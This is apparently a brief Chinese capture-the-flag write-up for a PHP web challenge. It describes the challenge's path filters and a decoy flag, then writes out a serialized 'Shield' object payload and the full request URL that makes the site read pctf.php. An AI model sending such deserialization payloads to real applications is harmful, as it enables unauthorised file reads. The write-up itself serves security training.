综合分析:题目过滤了 ".."、"/"、"\\"、"pctf"
根据提示, Flag
存在于 pctf.php
中
直接访问 http://web.jarvisoj.com:32768/pctf.php
,提示 FLAG:PCTF{I_4m_not_fl4g}
,欲盖弥彰,哈哈!
查看源码: view-source:http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=
,提示 Filenotfound!
在index.php中我们看到可以通过 Readfile
函数读取一个反序列化的成员变量( pctf.php
),变量名正好是我们传入的参数( class
),于是构造以下序列化字符串:
O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
复制
访问 http://web.jarvisoj.com:32768/index.php?g=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
即可得到 flag
!
暂无评论内容